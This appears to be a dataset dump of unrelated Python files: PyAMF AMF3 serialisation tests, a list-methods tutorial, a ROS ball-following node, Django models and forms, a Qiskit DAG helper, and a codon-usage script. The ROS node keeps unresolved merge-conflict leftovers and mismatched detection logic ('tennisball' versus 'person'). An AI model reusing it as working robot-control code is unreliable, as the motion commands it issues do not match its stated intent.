# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\n\x00')
self.buf.truncate()
def test_object_proxy_inside_list(self):
self.encoder.use_proxies = True
obj = [{'spam': 'eggs'}]
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07Cflex.messaging.io.ArrayCollection\t\x03\x01\n\x07;'
b'flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs\x01'
)
def test_short(self):
self.x.writeShort(55)
self.assertEqual(self.buf.getvalue(), b'\x007')
self.buf.truncate()
self.x.writeShort(-55)
self.assertEqual(self.buf.getvalue(), b'\xff\xc9')
def test_uint(self):
    """writeUnsignedInt writes 4 bytes big-endian and rejects negative values."""
    self.x.writeUnsignedInt(55)
    self.assertEqual(self.buf.getvalue(), b'\x00\x00\x007')
    self.buf.truncate()
    self.assertRaises(OverflowError, self.x.writeUnsignedInt, -55)
def test_utf(self):
    """writeUTF prefixes the UTF-8 payload with a 2-byte byte-length."""
    self.x.writeUTF(u'ἔδωσαν')
    self.assertEqual(
        self.buf.getvalue(),
        b'\x00\r\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd'
    )
def test_utf_bytes(self):
    """writeUTFBytes writes the raw UTF-8 payload with no length prefix."""
    self.x.writeUTFBytes(u'ἔδωσαν')
    self.assertEqual(
        self.buf.getvalue(),
        b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd'
    )
class DataInputTestCase(unittest.TestCase):
    """
    Tests for L{amf3.DataInput}: reading typed primitive values back out of
    an AMF3 byte stream.
    """

    def setUp(self):
        self.buf = util.BufferedByteStream()
        self.decoder = amf3.Decoder(self.buf)

    def test_create(self):
        x = amf3.DataInput(self.decoder)
        self.assertEqual(x.decoder, self.decoder)
        self.assertEqual(x.stream, self.buf)
        self.assertEqual(x.stream, self.decoder.stream)

    def _test(self, bytes, value, func, *params):
        # Helper: load `bytes` into the stream, call func(*params), compare
        # the result to `value`, then reset the buffer for the next case.
        self.buf.write(bytes)
        self.buf.seek(0)
        self.assertEqual(func(*params), value)
        self.buf.truncate()

    def test_boolean(self):
        x = amf3.DataInput(self.decoder)
        self.buf.write(b'\x01')
        self.buf.seek(-1, 2)
        self.assertEqual(x.readBoolean(), True)
        self.buf.write(b'\x00')
        self.buf.seek(-1, 2)
        self.assertEqual(x.readBoolean(), False)

    def test_byte(self):
        x = amf3.DataInput(self.decoder)
        self.buf.write(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09')
        self.buf.seek(0)
        for y in range(10):
            self.assertEqual(x.readByte(), y)

    def test_double(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x00' * 8, 0.0, x.readDouble)
        self._test(b'@\x93JEm\\\xfa\xad', 1234.5678, x.readDouble)

    def test_float(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x00' * 4, 0.0, x.readFloat)
        self._test(b'?\x00\x00\x00', 0.5, x.readFloat)

    def test_int(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x00\x00\x00\x00', 0, x.readInt)
        self._test(b'\xff\xff\xcf\xc7', -12345, x.readInt)
        self._test(b'\x00\x00\x00b', 98, x.readInt)

    def test_multi_byte(self):
        # TODO nick: test multiple charsets
        x = amf3.DataInput(self.decoder)
        self._test(
            'this is a test',
            'this is a test',
            x.readMultiByte,
            14, 'utf-8'
        )
        self._test(
            b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
            u'ἔδωσαν',
            x.readMultiByte,
            13,
            'utf-8'
        )

    def test_object(self):
        x = amf3.DataInput(self.decoder)
        self._test(
            b'\t\x01\x09spam\x06\x09eggs\x01',
            {'spam': 'eggs'},
            x.readObject
        )
        # check references
        self._test(b'\t\x00', {'spam': 'eggs'}, x.readObject)

    def test_short(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x007', 55, x.readShort)
        self._test(b'\xff\xc9', -55, x.readShort)

    def test_uint(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x00\x00\x007', 55, x.readUnsignedInt)

    def test_utf(self):
        x = amf3.DataInput(self.decoder)
        self._test(b'\x00\x0bhello world', u'hello world', x.readUTF)
        self._test(
            b'\x00\r\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
            u'ἔδωσαν',
            x.readUTF
        )

    def test_utf_bytes(self):
        x = amf3.DataInput(self.decoder)
        self._test(
            b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
            u'ἔδωσαν',
            x.readUTFBytes,
            13
        )
class ClassInheritanceTestCase(ClassCacheClearingTestCase, EncoderMixIn):
    """
    Tests that AMF3 encoding of a registered class also serialises the
    static attributes declared on its parent class aliases.
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        EncoderMixIn.setUp(self)

    def test_simple(self):
        class A(object):
            pass

        alias = pyamf.register_class(A, 'A')
        alias.static_attrs = ['a']

        class B(A):
            pass

        alias = pyamf.register_class(B, 'B')
        alias.static_attrs = ['b']

        x = B()
        x.a = 'spam'
        x.b = 'eggs'

        # Encoded under alias 'B' but containing the inherited 'a' attribute.
        self.assertEncoded(
            x,
            b'\n+\x03B\x03a\x03b\x06\tspam\x06\teggs\x01'
        )

    def test_deep(self):
        class A(object):
            pass

        alias = pyamf.register_class(A, 'A')
        alias.static_attrs = ['a']

        class B(A):
            pass

        alias = pyamf.register_class(B, 'B')
        alias.static_attrs = ['b']

        class C(B):
            pass

        alias = pyamf.register_class(C, 'C')
        alias.static_attrs = ['c']

        x = C()
        x.a = 'spam'
        x.b = 'eggs'
        x.c = 'foo'

        self.assertEncoded(
            x,
            b'\n;\x03C\x03a\x03b\x03c\x06\tspam\x06\teggs\x06\x07foo\x01'
        )
class ComplexEncodingTestCase(unittest.TestCase, EncoderMixIn):
    """
    Tests for encoding nested registered classes and for the class-reference
    table maintained by the AMF3 encoder context.
    """

    amf_type = pyamf.AMF3

    class TestObject(object):
        def __init__(self):
            self.number = None
            self.test_list = ['test']
            self.sub_obj = None
            self.test_dict = {'test': 'ignore'}

        def __repr__(self):
            return '<TestObject %r @ 0x%x>' % (self.__dict__, id(self))

    class TestSubObject(object):
        def __init__(self):
            self.number = None

        def __repr__(self):
            return '<TestSubObject %r @ 0x%x>' % (self.__dict__, id(self))

    def setUp(self):
        EncoderMixIn.setUp(self)
        pyamf.register_class(self.TestObject, 'test_complex.test')
        pyamf.register_class(self.TestSubObject, 'test_complex.sub')

    def tearDown(self):
        EncoderMixIn.tearDown(self)
        pyamf.unregister_class(self.TestObject)
        pyamf.unregister_class(self.TestSubObject)

    def build_complex(self, max=5):
        # Build `max` TestObjects, each owning a TestSubObject.
        # NOTE(review): `max` shadows the builtin; harmless here, but worth
        # renaming if this helper grows.
        test_objects = []
        for i in range(0, max):
            test_obj = self.TestObject()
            test_obj.number = i
            test_obj.sub_obj = self.TestSubObject()
            test_obj.sub_obj.number = i
            test_objects.append(test_obj)
        return test_objects

    def complex_trial(self):
        # Both classes must be present in the context after encoding.
        to_cd = self.context.getClass(self.TestObject)
        tso_cd = self.context.getClass(self.TestSubObject)
        self.assertIdentical(to_cd.alias.klass, self.TestObject)
        self.assertIdentical(tso_cd.alias.klass, self.TestSubObject)
        self.assertEqual(self.context.getClassByReference(3), None)

    def complex_encode_decode_test(self, decoded):
        for obj in decoded:
            self.assertEqual(self.TestObject, obj.__class__)
            self.assertEqual(self.TestSubObject, obj.sub_obj.__class__)

    def test_complex_dict(self):
        # NOTE(review): `complex` shadows the builtin - local to the test.
        complex = {'element': 'ignore', 'objects': self.build_complex()}
        self.encoder.writeElement(complex)
        self.complex_trial()

    def test_complex_encode_decode_dict(self):
        complex = {'element': 'ignore', 'objects': self.build_complex()}
        self.encoder.writeElement(complex)
        encoded = self.encoder.stream.getvalue()
        context = amf3.Context()
        decoded = amf3.Decoder(encoded, context).readElement()
        self.complex_encode_decode_test(decoded['objects'])

    def test_class_refs(self):
        # Class definitions are added to the reference table in first-use
        # order and reused (not re-added) on subsequent writes.
        a = self.TestSubObject()
        b = self.TestSubObject()
        self.encoder.writeObject(a)
        cd = self.context.getClass(self.TestSubObject)
        self.assertIdentical(self.context.getClassByReference(0), cd)
        self.assertEqual(self.context.getClassByReference(1), None)
        self.encoder.writeElement({'foo': 'bar'})
        cd2 = self.context.getClass(dict)
        self.assertIdentical(self.context.getClassByReference(1), cd2)
        self.assertEqual(self.context.getClassByReference(2), None)
        self.encoder.writeElement({})
        self.assertIdentical(self.context.getClassByReference(0), cd)
        self.assertIdentical(self.context.getClassByReference(1), cd2)
        self.assertEqual(self.context.getClassByReference(2), None)
        self.encoder.writeElement(b)
        self.assertIdentical(self.context.getClassByReference(0), cd)
        self.assertIdentical(self.context.getClassByReference(1), cd2)
        self.assertEqual(self.context.getClassByReference(2), None)
        c = self.TestObject()
        self.encoder.writeElement(c)
        cd3 = self.context.getClass(self.TestObject)
        self.assertIdentical(self.context.getClassByReference(0), cd)
        self.assertIdentical(self.context.getClassByReference(1), cd2)
        self.assertIdentical(self.context.getClassByReference(2), cd3)
class ExceptionEncodingTestCase(ClassCacheClearingTestCase, EncoderMixIn):
    """
    Tests for encoding exceptions.
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        EncoderMixIn.setUp(self)

    def test_exception(self):
        try:
            raise Exception('foo bar')
        except Exception as e:
            self.encoder.writeElement(e)
        value = self.buf.getvalue()
        # Attribute ordering inside the encoded object is not guaranteed,
        # so accept either serialisation (message-first or name-first); the
        # try/assert/except pattern falls through to the alternative bytes.
        try:
            self.assertEqual(
                value,
                b'\n\x0b\x01\x0fmessage\x06'
                b'\x0ffoo bar\tname\x06'
                b'\x13Exception\x01'
            )
        except:
            self.assertEqual(
                value,
                b'\n\x0b\x01\tname\x06'
                b'\x13Exception\x0f'
                b'message\x06\x0ffoo bar\x01'
            )

    def test_user_defined(self):
        class FooBar(Exception):
            pass

        try:
            raise FooBar('foo bar')
        except Exception as e:
            self.encoder.writeElement(e)
        value = self.buf.getvalue()
        try:
            self.assertEqual(
                value,
                b'\n\x0b\x01\x0fmessage\x06'
                b'\x0ffoo bar\tname\x06\rFooBar\x01'
            )
        except:
            self.assertEqual(
                value,
                b'\n\x0b\x01\tname\x06\rFooBar'
                b'\x0fmessage\x06\x0ffoo bar\x01'
            )

    def test_typed(self):
        class XYZ(Exception):
            pass

        pyamf.register_class(XYZ, 'foo.bar')
        try:
            raise XYZ('blarg')
        except Exception as e:
            self.encoder.writeElement(e)
        value = self.buf.getvalue()
        try:
            self.assertEqual(
                value,
                b'\n\x0b\x0ffoo.bar\x0f'
                b'message\x06\x0bblarg\t'
                b'name\x06\x07XYZ\x01'
            )
        except:
            self.assertEqual(
                value,
                b'\n\x0b\x0ffoo.bar\t'
                b'name\x06\x07XYZ\x0f'
                b'message\x06\x0bblarg\x01'
            )
class ByteArrayTestCase(unittest.TestCase):
    """
    Tests for L{amf3.ByteArray}
    """

    def test_write_context(self):
        """
        @see: #695
        """
        obj = {'foo': 'bar'}
        b = amf3.ByteArray()
        b.writeObject(obj)
        bytes = b.getvalue()
        b.stream.truncate()
        b.writeObject(obj)
        # Truncating must also reset the reference tables, so the second
        # write yields identical bytes rather than an object reference.
        self.assertEqual(b.getvalue(), bytes)

    def test_context(self):
        b = amf3.ByteArray()
        c = b.context
        obj = {'foo': 'bar'}
        c.addObject(obj)
        b.writeObject(obj)
        self.assertEqual(b.getvalue(), b'\n\x0b\x01\x07foo\x06\x07bar\x01')

    def test_read_context(self):
        """
        @see: #695
        """
        obj = {'foo': 'bar'}
        b = amf3.ByteArray()
        b.stream.write(b'\n\x0b\x01\x07foo\x06\x07bar\x01\n\x00')
        b.stream.seek(0)
        self.assertEqual(obj, b.readObject())
        # The trailing b'\n\x00' is an object reference that the ByteArray's
        # fresh read context must refuse to resolve.
        self.assertRaises(pyamf.ReferenceError, b.readObject)

    def test_compressed(self):
        """
        ByteArrays can be compressed. Test the C{compressed} attribute for
        validity.
        """
        try:
            import zlib
        except ImportError:
            self.skipTest('zlib is missing')
        ba = amf3.ByteArray()
        self.assertFalse(ba.compressed)
        z = zlib.compress(b'b' * 100)
        ba = amf3.ByteArray(z)
        self.assertTrue(ba.compressed)
        z = zlib.compress(b'\x00' * 100)
        ba = amf3.ByteArray(z)
        self.assertTrue(ba.compressed)
|
# list methods 2
# we will be going over some uses of lists

# let's first create 2 lists
my_first_list = [1, 2, 3, 4, 5]
my_second_list = [6, 7, 8, 9, 10]

# reversing a list (in place - reverse() returns None)
my_first_list.reverse()
print(my_first_list)

# sorting a list (in place - sort() returns None)
my_second_list.sort()
print(my_second_list)

# adding 2 lists: + concatenates them into a brand-new list
my_third_list = my_first_list + my_second_list
# bug fix: show the combined list (the original printed my_first_list again)
print(my_third_list)

# counting elements
# we will count the number of occurrences of an element
# this should return the number of times 6 is in the list
print(my_second_list.count(6))

# get index of element
# we will get the index of where 6 is in our list
print(my_second_list.index(6))

# slicing lists
# slicing means selecting only a part of a list
# this selects the elements from index 3 up to (but not including) index 8
spliced_list = my_third_list[3:8]
print(spliced_list)

# this will assign the first 5 elements in the list to spliced_list
spliced_list = my_first_list[:5]
print(spliced_list)

# this will assign all the elements from index 5 to the end
# (empty here, because my_first_list only has 5 elements)
spliced_list = my_first_list[5:]
print(spliced_list)

# lists are good to work with loops
# this will print out all the elements in the list
for i in my_first_list:
    print(i)
10,530 | 0164633c0119e72cce5e67a0ae9997dda8d0ffbd | #!/usr/bin/env python
import rospy, cv2, cv_bridge, numpy
from sensor_msgs.msg import Image
from geometry_msgs.msg import Twist
from std_msgs.msg import String
from nav_msgs.msg import Odometry
from darknet_ros_msgs.msg import BoundingBoxes, ObjectCount
from tf import TransformListener
from navigation.srv import *
# Clamp for the published angular velocity (rad/s).
MAX_ANGULAR_VEL = 0.0005
#<<<<<<< HEAD
# NOTE(review): the line above is a leftover git merge-conflict marker that
# was "resolved" by commenting it out; both sides of the conflict survive in
# this file as two competing Follower definitions.
flag=False
# NOTE(review): this first Follower definition is DEAD CODE - it is shadowed
# by the second `class Follower` defined immediately below, which redefines
# the name before any instance is created. It should be deleted once the
# merge is properly resolved.
class Follower():
    def __init__(self):
        global flag
        self.bridge = cv_bridge.CvBridge()
        #cv2.namedWindow("window", 1)
        self.depth_sub = rospy.Subscriber('/zed/zed_node/depth/depth_registered', Image, self.detect_callback)
        self.image_sub = rospy.Subscriber('darknet_ros/bounding_boxes',BoundingBoxes, self.image_callback)
        self.object_cnt_sub = rospy.Subscriber('/darknet_ros/found_object', ObjectCount, self.object_callback)
#=======
class Follower():
    """Visual-servoing node: steers the robot toward a detected "tennisball"
    (darknet_ros bounding boxes) using the ZED depth image, and publishes
    geometry_msgs/Twist commands on /cmd_vel.

    Sets the module-level `flag` once a command has been issued for a valid
    detection, which unblocks the `adjust_service` handler in execute().
    """

    def __init__(self):
        global flag
        self.bridge = cv_bridge.CvBridge()
        #cv2.namedWindow("window", 1)
        self.depth_sub = rospy.Subscriber('/zed/zed_node/depth/depth_registered', Image, self.detect_callback)
        self.image_sub = rospy.Subscriber('darknet_ros/bounding_boxes', BoundingBoxes, self.image_callback)
        self.object_cnt_sub = rospy.Subscriber('/darknet_ros/found_object', ObjectCount, self.object_callback)
        self.cmd_vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=5)
        self.twist = Twist()
        print("follower class initialised")
        self.rate = rospy.Rate(10)
        flag = False
        # Latest depth frame; None until the first depth message arrives.
        self.depth_data = None

    def detect_callback(self, data):
        # Bug fix: the depth frame was previously stored in a *local*
        # variable, so image_callback crashed with a NameError when it read
        # `depth_data`. Keep it on the instance instead.
        self.depth_data = self.bridge.imgmsg_to_cv2(data)

    def image_callback(self, msg):
        # Bug fix: `flag` was assigned without a `global` statement, so the
        # assignment created a local and execute() could never unblock.
        global flag
        # Bounding box of the first detection: [xmin, ymin, xmax, ymax].
        self.valuexmin = msg.bounding_boxes[0].xmin
        self.valuexmax = msg.bounding_boxes[0].xmax
        self.valueymin = msg.bounding_boxes[0].ymin
        self.valueymax = msg.bounding_boxes[0].ymax
        if msg.bounding_boxes[0].Class == "tennisball":
            print("Detected Person")
            self.cx = (self.valuexmin + self.valuexmax) / 2
            self.cy = (self.valueymin + self.valueymax) / 2
            # Horizontal error from the image centre column (640 px).
            self.err = 640 - self.cx
            print("Error is: ", self.err)
            self.twist.linear.x = 0
            self.twist.angular.z = 0
            if self.depth_data is None:
                # No depth frame yet - cannot range-gate, skip this cycle.
                return
            # NOTE(review): index order [cx][cy] kept from the original -
            # depth images are usually row-major [y][x]; verify on hardware.
            if self.depth_data[int(self.cx)][int(self.cy)] > 1:
                if self.err > 250 or self.err < -250:
                    # Turn toward the target, clamped to MAX_ANGULAR_VEL.
                    self.twist.angular.z = float(self.err) / 500
                    if self.twist.angular.z > MAX_ANGULAR_VEL:
                        self.twist.angular.z = MAX_ANGULAR_VEL
                    if self.twist.angular.z < -MAX_ANGULAR_VEL:
                        self.twist.angular.z = -MAX_ANGULAR_VEL
                else:
                    self.twist.angular.z = 0
                    self.twist.linear.x = 0.1
            else:
                # Ball is within 1 m - stop.
                self.twist.angular.z = 0
                self.twist.linear.x = 0
            self.cmd_vel_pub.publish(self.twist)
            flag = True
            print("Published Velocity", self.twist)
        if "person" not in msg.bounding_boxes[0].Class:
            # Target class lost: publish zero velocity repeatedly to stop.
            for i in range(10):
                self.twist = Twist()
                self.cmd_vel_pub.publish(self.twist)

    def object_callback(self, msg):
        # No detections at all: command a full stop at the node rate.
        self.object_cnt = msg.count
        if self.object_cnt == 0:
            for i in range(10):
                self.twist = Twist()
                self.cmd_vel_pub.publish(self.twist)
                self.rate.sleep()
# <<<<<<< HEAD
def execute(goal):
    """Service handler for 'adjust_service': start a Follower and block until
    image_callback reports a velocity command was issued (module-level
    `flag`), then return success.
    """
    global flag
    follower = Follower()
    # Poll with a short sleep instead of the original `while not flag: pass`
    # busy-wait, which pinned a CPU core at 100%.
    while not flag:
        rospy.sleep(0.05)
    return AdjustResponse(True)
if __name__ == "__main__":
    try:
        rospy.init_node('follower')
        # The follower behaviour is exposed as a ROS service; the Follower
        # instance itself is created inside the execute() handler.
        s = rospy.Service('adjust_service', Adjust, execute)
# =======
# NOTE(review): the commented block below is the other side of an unresolved
# git merge (see the conflict hash) and should be removed.
# if __name__ == "__main__":
#     try:
#         rospy.init_node('follower')
#         follower = Follower()
# >>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
        rospy.spin()
    except Exception as e:
        print("exception is: ", e)
10,531 | bb31cf5e6b6cc550c7ffe6a83fad9a133f140d38 | from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import BaseUserManager
from django.db import models
#from review.views import ReviewViewSet
#import Review
from django.db.models import Avg
class AccountManager(BaseUserManager):
    """Manager that creates Account instances keyed on e-mail address."""

    def create_user(self, email, password=None, **kwargs):
        """Create and persist a regular user; email and username are required."""
        if not email:
            raise ValueError('Users must have a valid email address.')
        username = kwargs.get('username')
        if not username:
            raise ValueError('Users must have a valid username.')
        new_account = self.model(
            email=self.normalize_email(email),
            username=username,
        )
        new_account.set_password(password)
        new_account.save()
        return new_account

    def create_superuser(self, email, password, **kwargs):
        """Create a user and promote it to admin."""
        admin_account = self.create_user(email, password, **kwargs)
        admin_account.is_admin = True
        admin_account.save()
        return admin_account
class Account(AbstractBaseUser):
    """Custom user model authenticated by e-mail address (USERNAME_FIELD)."""

    username = models.CharField(max_length=40, unique=True)
    email = models.EmailField(unique=True)
    first_name = models.CharField(max_length=40)
    last_name = models.CharField(max_length=40)
    tagline = models.CharField(max_length=140, blank=True)
    is_admin = models.BooleanField(default=False)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    # The default image is default.png so we should always have it in media/userimages/
    image = models.ImageField(upload_to='userimages/', default='userimages/default.png')

    objects = AccountManager()

    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ['username']

    def __unicode__(self):
        return self.username

    def get_full_name(self):
        return u' '.join([self.first_name, self.last_name])

    def get_short_name(self):
        return self.first_name

    def _average_rating(self):
        """Return the mean rating grade of reviews about this user, or None.

        Deferred import avoids a circular dependency with the review app.
        Bug fix: look the aggregate up by its alias key instead of
        ``.values()[0]`` - dict views are not indexable on Python 3 and
        their ordering is not something to rely on.
        """
        from review import models as review_models
        result = review_models.Review.objects.filter(
            reviewed_user=self.id
        ).aggregate(avg_rating=Avg('rating__rating_grade'))
        return result['avg_rating']

    @property
    def avg_rating(self):
        """Average rating, or the string 'Not rated yet' if there are no reviews."""
        avg = self._average_rating()
        if avg is None:
            return 'Not rated yet'
        return avg

    @property
    def avg_rating_round(self):
        """Rounded average rating, or 'Not rated yet' if there are no reviews."""
        avg = self._average_rating()
        if avg is None:
            return 'Not rated yet'
        return round(avg)
class UserImage(models.Model):
    # Extra images uploaded by a user, in addition to Account.image.
    # NOTE(review): ForeignKey has no on_delete argument, so this targets
    # Django < 2.0 (implicit CASCADE); confirm before any framework upgrade.
    user = models.ForeignKey(Account)
    image = models.ImageField(max_length = None, upload_to='userimages', default = 'userimages/None-No-img.jpg')
|
10,532 | e687ed7ac8ef779cf18ed5ff3517d850ac88d4fb | # -*- coding: utf-8 -*-
from django import forms
from app.models import *
class LivroForm(forms.ModelForm):
    """ModelForm for creating/editing Livro (book) records."""
    class Meta:
        model = Livro
        fields = ['titulo', 'ano_publicacao', 'autor']
class AutorForm(forms.ModelForm):
    """ModelForm for creating/editing Autor (author) records."""
    class Meta:
        model = Autor
        fields = ['nome',]
10,533 | f54896da89b093e96094f4b19cf451952e8e29e5 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Helper function for converting a dag dependency to a dag circuit"""
from qiskit.dagcircuit.dagcircuit import DAGCircuit
def dagdependency_to_dag(dagdependency):
    """Build a ``DAGCircuit`` object from a ``DAGDependency``.

    Args:
        dagdependency (DAGDependency): the input dag.

    Return:
        DAGCircuit: the DAG representing the input circuit.
    """
    dagcircuit = DAGCircuit()
    dagcircuit.name = dagdependency.name
    dagcircuit.metadata = dagdependency.metadata

    dagcircuit.add_qubits(dagdependency.qubits)
    dagcircuit.add_clbits(dagdependency.clbits)

    for register in dagdependency.qregs.values():
        dagcircuit.add_qreg(register)

    for register in dagdependency.cregs.values():
        dagcircuit.add_creg(register)

    # Replay the nodes in topological order so data dependencies are
    # preserved in the resulting DAGCircuit.
    for node in dagdependency.topological_nodes():
        # Copy the operation so mutating the new DAG cannot affect the input.
        inst = node.op.copy()
        dagcircuit.apply_operation_back(inst, node.qargs, node.cargs)

    # copy metadata
    dagcircuit.global_phase = dagdependency.global_phase
    dagcircuit.calibrations = dagdependency.calibrations

    return dagcircuit
|
10,534 | bc3112a6f179d78ec9c19c32f07c24e657abd589 | # Copyright (C) 2017 William M. Jacobs
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or (at
# your option) any later version.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse, sys, os, random, math, gzip, pickle, os.path
from collections import defaultdict
from itertools import combinations, combinations_with_replacement
import numpy as np
import scipy.stats
from codons import codon_to_aa, codon_table
#read a fasta file
def read_fasta(path):
    """Parse a FASTA file into a {header: sequence} dict.

    Blank lines and lines containing '#' are skipped; a line containing
    '>' starts a new record keyed by the rest of that line. Duplicate
    headers keep the last record, matching the original dict build.
    """
    headers, sequences = [], []
    with open(path, 'r') as handle:
        for raw_line in handle:
            if len(raw_line) <= 1 or '#' in raw_line:
                continue
            if '>' in raw_line:
                headers.append(raw_line[1:].strip())
                sequences.append('')
            else:
                sequences[-1] += raw_line.strip()
    return dict(zip(headers, sequences))
# Map each amino acid to the list of codons encoding it (stop codons
# excluded), derived from the imported codon_to_aa table.
aa_codons = {aa : [c for c in codon_to_aa if codon_to_aa[c] == aa] \
             for aa in codon_to_aa.values() if aa != 'Stop'}
#determines whether or not a codon is rare
def israre(codon_usage, rare_model, rare_threshold, c):
    """Return True if codon ``c`` is rare in ``codon_usage``.

    'no_norm'   -- compare the raw relative usage against the threshold.
    'cmax_norm' -- first normalise by the most-used synonymous codon.
    Returns None for an unrecognised model (preserving the original
    fall-through behaviour).
    """
    if rare_model == 'no_norm':
        # Idiom fix: return the comparison directly instead of
        # `if ...: return True / else: return False`.
        return codon_usage[c] <= rare_threshold
    if rare_model == 'cmax_norm':
        cmax = max(codon_usage[cc] for cc in aa_codons[codon_to_aa[c]])
        return codon_usage[c] / cmax <= rare_threshold
    return None
def calc_codon_usage(fasta, abundances=None, output="", rare_model='no_norm', rare_threshold=0.1, max_len_diff=0.2, group_dpercentile=10, wt_gi='gi|556503834|ref|NC_000913.3|', gi_index=None, verbose=False):
    """Compute abundance-weighted codon-usage statistics from MSA fasta file(s).

    Two-pass workflow keyed on the output directory: the first run writes
    input_codon_usage.p.gz with the overall per-GI usage; a second run reads
    that file, bins genes into rare-codon-fraction percentile groups and
    writes the per-group tables (rare_codons.dat, codon_usage.dat,
    codon_usage_wt.dat, codon_usage.p.gz).

    fasta             -- path, or list/tuple of paths, to MSA fasta inputs
    abundances        -- optional path to a "gene abundance" text file
    output            -- directory receiving all output files
    rare_model        -- 'no_norm' or 'cmax_norm' (see israre)
    rare_threshold    -- rarity cutoff passed to israre
    max_len_diff      -- max relative length difference vs. the WT sequence
    group_dpercentile -- percentile width of the gene groups
    wt_gi             -- GI string identifying the wild-type sequence
    gi_index          -- unused here (the lookup code is commented out below)
    verbose           -- print progress information
    """
    #read fasta files
    seqs = {}
    if isinstance(fasta, str):
        gene = "".join(os.path.basename(fasta).split(".")[:-1])
        seqs[gene] = read_fasta(fasta)
    elif isinstance(fasta, (list, tuple)):
        for path in fasta:
            gene = "".join(os.path.basename(path).split(".")[:-1])
            seqs[gene] = read_fasta(path)
    if verbose:
        print("Loaded sequences for %d genes" % len(seqs))
    gis = sorted(set(gi for gene in seqs for gi in seqs[gene].keys()))
    #read abundance files
    try:
        with open(abundances, 'r') as f:
            abundances = {line.split()[0] : float(line.split()[1]) for line in f if len(line) > 1 and line[0] != '#'}
    except Exception as e:
        # Missing/unreadable abundance file: fall back to unweighted counts.
        abundances = {}
    '''
    if gi_index != None:
        with open(gi_index, 'r') as f:
            gi_index = {line.split()[0] : ' '.join(line.split()[1:]) \
                        for line in f if len(line) > 1 and line[0] != '#'}
        print("GIs:")
        for gi in gis:
            print("%32s: %s" % (gi, gi_index[gi]))
    '''
    #delete the sequences whose length differs from the WT too much
    nonwt_gis = [gi for gi in gis if gi != wt_gi]
    for gene in seqs:
        if wt_gi in seqs[gene]:
            # Lengths are gap-stripped before comparing against the WT.
            wtlen = len(seqs[gene][wt_gi]) - seqs[gene][wt_gi].count('-')
            for gi in nonwt_gis:
                if gi in seqs[gene]:
                    gilen = len(seqs[gene][gi]) - seqs[gene][gi].count('-')
                    if abs(1. - gilen / wtlen) > max_len_diff:
                        del seqs[gene][gi]
    rerun_flag = False
    try: # split sequences into deciles based on rare codon usage (calculated from first run)
        with gzip.open(os.path.join(output, 'input_codon_usage.p.gz'), 'rb') as f:
            input_relative_usage = pickle.load(f)['overall_codon_usage']
        def get_frac_rare(seq):
            # Mean (over GIs present in seq) fraction of non-gap, non-stop
            # codons that are rare under the first-run usage table.
            return np.mean([sum(1 if israre(input_relative_usage[gi], rare_model, \
                                            rare_threshold, seq[gi][3*i:3*(i + 1)]) else 0 \
                                for i in range(len(seq[gi]) // 3) if seq[gi][3*i:3*(i + 1)] != '---' \
                                and codon_to_aa[seq[gi][3*i:3*(i + 1)]] != 'Stop') / \
                            sum(1 for i in range(len(seq[gi]) // 3) if seq[gi][3*i:3*(i + 1)] != '---' \
                                and codon_to_aa[seq[gi][3*i:3*(i + 1)]] != 'Stop') \
                            for gi in gis if gi in seq])
        frac_rare = {gene : get_frac_rare(seq) for gene,seq in seqs.items() if len(seq) > 0}
        # groups[0] is the 'ND' (no data) bucket; the rest are percentile
        # (lo, hi) intervals listed from highest to lowest.
        groups = ['ND'] + [(np.percentile(list(frac_rare.values()), percentile), \
                            np.percentile(list(frac_rare.values()), percentile \
                                          + group_dpercentile)) \
                           for percentile in range(0, 100, group_dpercentile)][::-1]
        def get_gene_group(gene):
            # Index into `groups` for this gene; 0 = 'ND' when no sequences.
            if len(seqs[gene]) == 0:
                return 0
            else:
                x = get_frac_rare(seqs[gene])
                for i in range(1, len(groups)):
                    if x >= groups[i][0] and x <= groups[i][1]:
                        return i
        gene_group_labels = ['%05.3f:%05.3f' % (groups[i][0], groups[i][1]) \
                             if i > 0 else 'ND' for i in range(len(groups))]
    except IOError: #this is the first run, get general usage info
        rerun_flag = True
        groups = ['all']
        def get_gene_group(gene):
            return 0
        gene_group_labels = ['all']
    except KeyError: #code was run in the same output directory, but on a different set of inputs (input_codon_usage.p.gz isn't correct)
        os.remove(os.path.join(output, 'input_codon_usage.p.gz'))
        rerun_flag = True
        groups = ['all']
        def get_gene_group(gene):
